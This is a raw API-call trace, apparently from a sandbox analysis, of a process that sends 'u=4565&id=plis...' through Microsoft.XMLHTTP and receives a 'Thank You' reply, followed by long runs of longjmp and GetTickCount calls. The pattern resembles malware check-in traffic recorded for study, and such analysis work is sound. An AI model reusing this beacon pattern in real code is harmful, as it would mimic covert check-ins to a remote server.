	[0254.664] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), riid=0x7fef40d0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), ppvObject=0x26d010 | out: ppvObject=0x26d010*=0x0) returned 0x80004002
	[0254.665] XMLHTTPRequest:IUnknown:Release (This=0x3cacc0) returned 0x2
	[0254.665] XMLHTTPRequest:IUnknown:Release (This=0x47a5aa0) returned 0x1
	[0254.665] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x47a5aa0, riid=0x7fef914d588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x26dbf0 | out: ppvObject=0x26dbf0*=0x0) returned 0x80004002
	[0254.665] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x47a5aa0, riid=0x7fef914ccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x26dd90*="Send", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x26db44 | out: rgDispId=0x26db44*=5) returned 0x0
	[0254.665] XMLHTTPRequest:IUnknown:AddRef (This=0x47a5aa0) returned 0x2
	[0254.665] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x47a5aa0, riid=0x7fef914d588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x26d8d0 | out: ppvObject=0x26d8d0*=0x0) returned 0x80004002
	[0254.665] XMLHTTPRequest:IDispatch:Invoke (in: This=0x47a5aa0, dispIdMember=5, riid=0x7fef914ccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x1, pDispParams=0x26d8a8*(rgvarg=([0]=0x42be48*(varType=0x400c, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x42d9c0*(varType=0x8, wReserved1=0xa, wReserved2=0x0, wReserved3=0x0, varVal1="u=4565&id=plis&k=4565&u=4565", varVal2=0x0), varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x26d8f0, puArgErr=0x26d8c0 | out: pDispParams=0x26d8a8*(rgvarg=([0]=0x42be48*(varType=0x400c, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x42d9c0*(varType=0x8, wReserved1=0xa, wReserved2=0x0, wReserved3=0x0, varVal1="u=4565&id=plis&k=4565&u=4565", varVal2=0x0), varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x26d8f0*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x26d8c0*=0x26dd90) returned 0x0
	[0254.665] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7fef40d08a0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x26cf48 | out: ppvObject=0x26cf48*=0x3cacc0) returned 0x0
	[0254.665] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7feff837e20*(Data1=0x79eac9e4, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), riid=0x7feff837e20*(Data1=0x79eac9e4, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x5a52f98 | out: ppvObject=0x5a52f98*=0x0) returned 0x80004002
	[0254.665] XMLHTTPRequest:IUnknown:Release (This=0x3cacc0) returned 0x2
	[0254.666] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7fef40d08a0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x26ba48 | out: ppvObject=0x26ba48*=0x3cacc0) returned 0x0
	[0254.666] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7feff83f170*(Data1=0x4f9f9fcb, Data2=0xe0f4, Data3=0x48eb, Data4=([0]=0xb7, [1]=0xab, [2]=0xfa, [3]=0x2e, [4]=0xa9, [5]=0x36, [6]=0x5c, [7]=0xb4)), riid=0x7feff83f170*(Data1=0x4f9f9fcb, Data2=0xe0f4, Data3=0x48eb, Data4=([0]=0xb7, [1]=0xab, [2]=0xfa, [3]=0x2e, [4]=0xa9, [5]=0x36, [6]=0x5c, [7]=0xb4)), ppvObject=0x115888 | out: ppvObject=0x115888*=0x0) returned 0x80004002
	[0254.666] XMLHTTPRequest:IUnknown:Release (This=0x3cacc0) returned 0x2
	[0264.744] XMLHTTPRequest:IUnknown:Release (This=0x47a5aa0) returned 0x1
	[0264.744] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x47a5aa0, riid=0x7fef914d588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x26dbf8 | out: ppvObject=0x26dbf8*=0x0) returned 0x80004002
	[0264.745] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x47a5aa0, riid=0x7fef914ccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x26dd10*="responseText", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x26db4c | out: rgDispId=0x26db4c*=10) returned 0x0
	[0264.745] XMLHTTPRequest:IUnknown:AddRef (This=0x47a5aa0) returned 0x2
	[0264.745] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x47a5aa0, riid=0x7fef914d588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x26d8d0 | out: ppvObject=0x26d8d0*=0x0) returned 0x80004002
	[0264.745] XMLHTTPRequest:IDispatch:Invoke (in: This=0x47a5aa0, dispIdMember=10, riid=0x7fef914ccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x26d8a8*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x42be60, pExcepInfo=0x26d8f0, puArgErr=0x26d8c0 | out: pDispParams=0x26d8a8*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x42be60*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="'Thank You: 33702", varVal2=0x0), pExcepInfo=0x26d8f0*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x26d8c0*=0x26dd90) returned 0x0
	[0264.746] XMLHTTPRequest:IUnknown:Release (This=0x47a5aa0) returned 0x1
	[0264.746] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x47a5aa0, riid=0x7fef914d588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x26d4a8 | out: ppvObject=0x26d4a8*=0x0) returned 0x80004002
	[0264.747] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x47a5aa0, riid=0x7fef914ccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x26d5c0*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x26d3fc | out: rgDispId=0x26d3fc*=7) returned 0x0
	[0264.747] XMLHTTPRequest:IUnknown:AddRef (This=0x47a5aa0) returned 0x3
	[0264.747] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x47a5aa0, riid=0x7fef914d588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x26d180 | out: ppvObject=0x26d180*=0x0) returned 0x80004002
	[0264.747] XMLHTTPRequest:IDispatch:Invoke (in: This=0x47a5aa0, dispIdMember=7, riid=0x7fef914ccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x26d158*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x42be18, pExcepInfo=0x26d1a0, puArgErr=0x26d170 | out: pDispParams=0x26d158*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x42be18*(varType=0x3, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0xc8, varVal2=0x0), pExcepInfo=0x26d1a0*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x26d170*=0x0) returned 0x0
	[0264.747] XMLHTTPRequest:IUnknown:Release (This=0x47a5aa0) returned 0x2
	[0264.749] ??3@YAXPEAX@Z () returned 0x3c3df301
	[0264.749] malloc (_Size=0xa8) returned 0x3de0b0
	[0264.751] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x47a5aa0, riid=0x7fef914d588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x26d4a8 | out: ppvObject=0x26d4a8*=0x0) returned 0x80004002
	[0264.751] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x47a5aa0, riid=0x7fef914ccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x26d5c0*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x26d3fc | out: rgDispId=0x26d3fc*=7) returned 0x0
	[0264.752] XMLHTTPRequest:IUnknown:AddRef (This=0x47a5aa0) returned 0x3
	[0264.752] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x47a5aa0, riid=0x7fef914d588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x26d180 | out: ppvObject=0x26d180*=0x0) returned 0x80004002
	[0264.752] XMLHTTPRequest:IDispatch:Invoke (in: This=0x47a5aa0, dispIdMember=7, riid=0x7fef914ccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x26d158*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x42be18, pExcepInfo=0x26d1a0, puArgErr=0x26d170 | out: pDispParams=0x26d158*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x42be18*(varType=0x3, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0xc8, varVal2=0x0), pExcepInfo=0x26d1a0*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x26d170*=0xffffffff) returned 0x0
	[0264.752] XMLHTTPRequest:IUnknown:Release (This=0x47a5aa0) returned 0x2
	[0264.753] XMLHTTPRequest:IUnknown:Release (This=0x3cacc0) returned 0x1
	[0264.753] XMLHTTPRequest:IUnknown:Release (This=0x3cacc0) returned 0x0
	[0264.753] ??3@YAXPEAX@Z () returned 0x3c3df301
	[0264.757] GetTickCount () returned 0x1176181
	[0264.757] GetTickCount () returned 0x1176181
	[0264.757] longjmp () 
	[0264.758] longjmp () 
	[0264.758] longjmp () 
	[0264.758] GetCurrentThreadId () returned 0x9a8
	[0264.758] GetCurrentThreadId () returned 0x9a8
	[0264.758] ??2@YAPEAX_K@Z () returned 0x3e4000
	[0264.758] malloc (_Size=0x80) returned 0x3c88b0
	[0264.758] longjmp () 
	[0264.759] longjmp () 
	[0264.759] longjmp () 
	[0264.759] longjmp () 
	[0264.759] longjmp () 
	[0264.760] longjmp () 
	[0264.760] longjmp () 
	[0264.760] longjmp () 
	[0264.760] longjmp () 
	[0264.760] longjmp () 
	[0264.761] longjmp () 
	[0264.761] longjmp () 
	[0264.761] longjmp () 
	[0264.761] longjmp () 
	[0264.761] longjmp () 
	[0264.761] longjmp () 
	[0264.762] longjmp () 
	[0264.762] longjmp () 
	[0264.762] longjmp () 
	[0264.762] longjmp () 
	[0264.762] longjmp () 
	[0264.763] longjmp () 
	[0264.763] longjmp () 
	[0264.763] longjmp () 
	[0264.763] longjmp () 
	[0264.763] longjmp () 
	[0264.763] longjmp () 
	[0264.763] longjmp () 
	[0264.764] longjmp () 
	[0264.764] GetTickCount () returned 0x1176191
	[0264.764] longjmp () 
	[0264.764] longjmp () 
	[0264.764] longjmp () 
	[0264.764] longjmp () 
	[0264.765] longjmp () 
	[0264.765] longjmp () 
	[0264.765] longjmp () 
	[0264.765] longjmp () 
	[0264.765] longjmp () 
	[0264.765] longjmp () 
	[0264.766] longjmp () 
	[0264.766] longjmp () 
	[0264.766] longjmp () 
	[0264.766] longjmp () 
	[0264.766] longjmp () 
	[0264.766] longjmp () 
	[0264.766] longjmp () 
	[0264.767] longjmp () 
	[0264.767] longjmp () 
	[0264.767] longjmp () 
	[0264.767] longjmp () 
	[0264.767] longjmp () 
	[0264.767] longjmp () 
	[0264.768] longjmp () 
	[0264.768] longjmp () 
	[0264.768] longjmp () 
	[0264.768] longjmp () 
	[0264.768] longjmp () 
	[0264.768] longjmp () 
	[0264.769] longjmp () 
	[0264.769] longjmp () 
	[0264.769] longjmp () 
	[0264.769] GetTickCount () returned 0x1176191
	[0264.769] longjmp () 
	[0264.769] longjmp () 
	[0264.769] longjmp () 
	[0264.770] longjmp () 
	[0264.770] longjmp () 
	[0264.770] longjmp () 
	[0264.770] longjmp () 
	[0264.770] longjmp () 
	[0264.770] longjmp () 
	[0264.771] longjmp () 
	[0264.771] longjmp () 
	[0264.771] longjmp () 
	[0264.771] longjmp () 
	[0264.771] longjmp () 
	[0264.771] longjmp () 
	[0264.772] longjmp () 
	[0264.772] longjmp () 
	[0264.772] longjmp () 
	[0264.772] longjmp () 
	[0264.772] longjmp () 
	[0264.773] longjmp () 
	[0264.773] longjmp () 
	[0264.773] longjmp () 
	[0264.773] longjmp () 
	[0264.774] longjmp () 
	[0264.774] longjmp () 
	[0264.774] longjmp () 
	[0264.774] longjmp () 
	[0264.775] longjmp () 
	[0264.775] longjmp () 
	[0264.775] longjmp () 
	[0264.775] longjmp () 
	[0264.776] GetTickCount () returned 0x1176191
	[0264.776] longjmp () 
	[0264.776] longjmp () 
	[0264.776] longjmp () 
	[0264.776] longjmp () 
	[0264.777] longjmp () 
	[0264.777] longjmp () 
	[0264.777] longjmp () 
	[0264.777] longjmp () 
	[0264.777] longjmp () 
	[0264.778] longjmp () 
	[0264.778] longjmp () 
	[0264.778] longjmp () 
	[0264.778] longjmp () 
	[0264.779] longjmp () 
	[0264.779] longjmp () 
	[0264.779] longjmp () 
	[0264.779] longjmp () 
	[0264.780] longjmp () 
	[0264.780] longjmp () 
	[0264.780] longjmp () 
	[0264.780] longjmp () 
	[0264.780] longjmp () 
	[0264.781] longjmp () 
	[0264.781] longjmp () 
	[0264.781] longjmp () 
	[0264.781] longjmp () 
	[0264.781] longjmp () 
	[0264.782] longjmp () 
	[0264.782] longjmp () 
	[0264.782] longjmp () 
	[0264.782] longjmp () 
	[0264.783] longjmp () 
	[0264.783] GetTickCount () returned 0x11761a1
	[0264.783] longjmp () 
	[0264.783] longjmp () 
	[0264.783] longjmp () 
	[0264.783] longjmp () 
	[0264.784] longjmp () 
	[0264.784] longjmp () 
	[0264.784] longjmp () 
	[0264.784] longjmp () 
	[0264.785] longjmp () 
	[0264.785] longjmp () 
	[0264.785] longjmp () 
	[0264.785] longjmp () 
	[0264.786] longjmp () 
	[0264.786] longjmp () 
	[0264.786] longjmp () 
	[0264.786] longjmp () 
	[0264.787] longjmp () 
	[0264.787] longjmp () 
	[0264.787] longjmp () 
	[0264.787] longjmp () 
	[0264.787] longjmp () 
	[0264.788] longjmp () 
	[0264.788] longjmp () 
	[0264.788] longjmp () 
	[0264.788] longjmp () 
	[0264.788] longjmp () 
	[0264.789] longjmp () 
	[0264.789] longjmp () 
	[0264.789] longjmp () 
	[0264.789] longjmp () 
	[0264.790] longjmp () 
	[0264.790] longjmp () 
	[0264.790] GetTickCount () returned 0x11761a1
	[0264.790] longjmp () 
	[0264.790] longjmp () 
	[0264.790] longjmp () 
	[0264.791] longjmp () 
	[0264.791] longjmp () 
	[0264.791] longjmp () 
	[0264.791] longjmp () 
	[0264.791] longjmp () 
	[0264.792] longjmp () 
	[0264.792] longjmp () 
	[0264.792] longjmp () 
	[0264.792] longjmp () 
	[0264.793] longjmp () 
	[0264.793] longjmp () 
	[0264.793] longjmp () 
	[0264.793] longjmp () 
	[0264.794] longjmp () 
	[0264.794] longjmp () 
	[0264.794] longjmp () 
	[0264.794] longjmp () 
	[0264.794] longjmp () 
	[0264.795] longjmp () 
	[0264.795] longjmp () 
	[0264.795] longjmp () 
	[0264.796] longjmp () 
	[0264.796] longjmp () 
	[0264.796] longjmp () 
	[0264.796] longjmp () 
	[0264.796] longjmp () 
	[0264.797] longjmp () 
	[0264.797] longjmp () 
	[0264.797] longjmp () 
	[0264.797] GetTickCount () returned 0x11761b0
	[0264.797] longjmp () 
	[0264.798] longjmp () 
	[0264.798] longjmp () 
	[0264.798] longjmp () 
	[0264.798] longjmp () 
	[0264.799] longjmp () 
	[0264.799] longjmp () 
	[0264.799] longjmp () 
	[0264.799] longjmp () 
	[0264.799] longjmp () 
	[0264.800] longjmp () 
	[0264.800] longjmp () 
	[0264.800] longjmp () 
	[0264.800] longjmp () 
	[0264.800] longjmp () 
	[0264.801] longjmp () 
	[0264.801] longjmp () 
	[0264.801] longjmp () 
	[0264.801] longjmp () 
	[0264.802] longjmp () 
	[0264.802] longjmp () 
	[0264.802] longjmp () 
	[0264.802] longjmp () 
	[0264.802] longjmp () 
	[0264.803] longjmp () 
	[0264.803] longjmp () 
	[0264.803] longjmp () 
	[0264.803] longjmp () 
	[0264.804] longjmp () 
	[0264.804] longjmp () 
	[0264.804] longjmp () 
	[0264.804] longjmp () 
	[0264.805] GetTickCount () returned 0x11761b0
	[0264.805] longjmp () 
	[0264.805] longjmp () 
	[0264.805] longjmp () 
	[0264.805] longjmp () 
	[0264.806] longjmp () 
	[0264.806] longjmp () 
	[0264.806] longjmp () 
	[0264.806] longjmp () 
	[0264.807] longjmp () 
	[0264.807] longjmp () 
	[0264.807] longjmp () 
	[0264.807] longjmp () 
	[0264.807] longjmp () 
	[0264.808] longjmp () 
	[0264.808] longjmp () 
	[0264.808] longjmp () 
	[0264.808] longjmp () 
	[0264.809] longjmp () 
	[0264.809] longjmp () 
	[0264.809] longjmp () 
	[0264.809] longjmp () 
	[0264.810] longjmp () 
	[0264.810] longjmp () 
	[0264.810] longjmp () 
	[0264.810] longjmp () 
	[0264.811] longjmp () 
	[0264.811] longjmp () 
	[0264.811] longjmp () 
	[0264.811] longjmp () 
	[0264.812] longjmp () 
	[0264.812] longjmp () 
	[0264.812] longjmp () 
	[0264.812] GetTickCount () returned 0x11761c0
	[0264.812] longjmp () 
	[0264.812] longjmp () 
	[0264.813] longjmp () 
	[0264.813] longjmp () 
	[0264.813] longjmp () 
	[0264.813] longjmp () 
	[0264.814] longjmp () 
	[0264.814] longjmp () 
	[0264.814] longjmp () 
	[0264.814] longjmp () 
	[0264.815] longjmp () 
	[0264.815] longjmp () 
	[0264.815] longjmp () 
	[0264.815] longjmp () 
	[0264.815] longjmp () 
	[0264.816] longjmp () 
	[0264.816] longjmp () 
	[0264.816] longjmp () 
	[0264.816] longjmp () 
	[0264.816] longjmp () 
	[0264.817] longjmp () 
	[0264.817] longjmp () 
	[0264.817] longjmp () 
	[0264.817] longjmp () 
	[0264.818] longjmp () 
	[0264.818] longjmp () 
	[0264.818] longjmp () 
	[0264.818] longjmp () 
	[0264.819] longjmp () 
	[0264.819] longjmp () 
	[0264.819] longjmp () 
	[0264.819] longjmp () 
	[0264.819] GetTickCount () returned 0x11761c0
	[0264.819] longjmp () 
	[0264.820] longjmp () 
	[0264.820] longjmp () 
	[0264.820] longjmp () 
	[0264.820] longjmp () 
	[0264.820] longjmp () 
	[0264.821] longjmp () 
	[0264.821] longjmp () 
	[0264.821] longjmp () 
	[0264.821] longjmp () 
	[0264.822] longjmp () 
	[0264.822] longjmp () 
	[0264.822] longjmp () 
	[0264.822] longjmp () 
	[0264.822] longjmp () 
	[0264.823] longjmp () 
	[0264.823] longjmp () 
	[0264.823] longjmp () 
	[0264.823] longjmp () 
	[0264.823] longjmp () 
	[0264.824] longjmp () 
	[0264.824] longjmp () 
	[0264.824] longjmp () 
	[0264.824] longjmp () 
	[0264.825] longjmp () 
	[0264.825] longjmp () 
	[0264.825] longjmp () 
	[0264.825] longjmp () 
	[0264.826] longjmp () 
	[0264.826] longjmp () 
	[0264.826] longjmp () 
	[0264.826] longjmp () 
	[0264.827] GetTickCount () returned 0x11761cf
	[0264.827] longjmp () 
	[0264.828] longjmp () 
	[0264.828] longjmp () 
	[0264.828] longjmp () 
	[0264.828] longjmp () 
	[0264.829] longjmp () 
	[0264.829] longjmp () 
	[0264.829] longjmp () 
	[0264.829] longjmp () 
	[0264.829] longjmp () 
	[0264.830] longjmp () 
	[0264.830] longjmp () 
	[0264.830] longjmp () 
	[0264.830] longjmp () 
	[0264.831] longjmp () 
	[0264.831] longjmp () 
	[0264.831] longjmp () 
	[0264.831] longjmp () 
	[0264.832] longjmp () 
	[0264.832] longjmp () 
	[0264.832] longjmp () 
	[0264.832] longjmp () 
	[0264.833] longjmp () 
	[0264.833] longjmp () 
	[0264.833] longjmp () 
	[0264.833] longjmp () 
	[0264.833] longjmp () 
	[0264.834] longjmp () 
	[0264.834] longjmp () 
	[0264.834] longjmp () 
	[0264.834] longjmp () 
	[0264.835] longjmp () 
	[0264.835] GetTickCount () returned 0x11761cf
	[0264.835] longjmp () 
	[0264.835] longjmp () 
	[0264.835] longjmp () 
	[0264.835] longjmp () 
	[0264.836] longjmp () 
	[0264.836] longjmp () 
	[0264.836] longjmp () 
	[0264.836] longjmp () 
	[0264.836] longjmp () 
	[0264.836] longjmp () 
	[0264.837] longjmp () 
	[0264.837] longjmp () 
	[0264.837] longjmp () 
	[0264.837] longjmp () 
	[0264.837] longjmp () 
	[0264.837] longjmp () 
	[0264.838] longjmp () 
	[0264.838] longjmp () 
	[0264.838] longjmp () 
	[0264.838] longjmp () 
	[0264.839] longjmp () 
	[0264.839] longjmp () 
	[0264.839] longjmp () 
	[0264.839] longjmp () 
	[0264.839] longjmp () 
	[0264.840] longjmp () 
	[0264.840] longjmp () 
	[0264.840] longjmp () 
	[0264.840] longjmp () 
	[0264.841] longjmp () 
	[0264.841] longjmp () 
	[0264.841] longjmp () 
	[0264.841] GetTickCount () returned 0x11761cf
	[0264.841] longjmp () 
	[0264.842] longjmp () 
	[0264.856] longjmp () 
	[0264.857] longjmp () 
	[0264.857] longjmp () 
	[0264.859] longjmp () 
	[0264.859] longjmp () 
	[0264.859] longjmp () 
	[0264.860] longjmp () 
	[0264.860] longjmp () 
	[0264.860] longjmp () 
	[0264.860] longjmp () 
	[0264.861] longjmp () 
	[0264.861] longjmp () 
	[0264.861] longjmp () 
	[0264.861] longjmp () 
	[0264.861] longjmp () 
	[0264.862] longjmp () 
	[0264.862] longjmp () 
	[0264.862] longjmp () 
	[0264.862] longjmp () 
	[0264.863] longjmp () 
	[0264.863] longjmp () 
	[0264.863] longjmp () 
	[0264.863] longjmp () 
	[0264.863] longjmp () 
	[0264.864] longjmp () 
	[0264.864] longjmp () 
	[0264.864] longjmp () 
	[0264.864] longjmp () 
	[0264.864] longjmp () 
	[0264.865] longjmp () 
	[0264.865] GetTickCount () returned 0x11761ef
	[0264.865] longjmp () 
	[0264.865] longjmp () 
	[0264.865] longjmp () 
	[0264.866] longjmp () 
	[0264.866] longjmp () 
	[0264.866] longjmp () 
	[0264.866] longjmp () 
	[0264.866] longjmp () 
	[0264.867] longjmp () 
	[0264.867] longjmp () 
	[0264.867] longjmp () 
	[0264.867] longjmp () 
	[0264.868] longjmp () 
	[0264.868] longjmp () 
	[0264.868] longjmp () 
	[0264.868] longjmp () 
	[0264.871] longjmp () 
	[0264.871] longjmp () 
	[0264.871] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x26d970 | out: lpclsid=0x26d970*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0264.871] SysStringLen (param_1=0x0) returned 0x0
	[0264.872] CoGetClassObject (in: rclsid=0x26d970*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef914e1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x26d940 | out: ppv=0x26d940*=0x7fef40bac20) returned 0x0
	[0264.872] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef40bac20, riid=0x7fef9156380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x26d948 | out: ppvObject=0x26d948*=0x0) returned 0x80004002
	[0264.872] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef40bac20, pUnkOuter=0x0, riid=0x7fef914ccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26d930 | out: ppvObject=0x26d930*=0x47a5aa0) returned 0x0
	[0264.873] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef40bac20) returned 0x1
	[0264.873] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x47a5aa0, riid=0x7fef91563b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x26d908 | out: ppvObject=0x26d908*=0x47a5b88) returned 0x0
	[0264.873] ??2@YAPEAX_K@Z () returned 0x3cacc0
	[0264.873] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x47a5b88, pUnkSite=0x3cacc0) returned 0x0
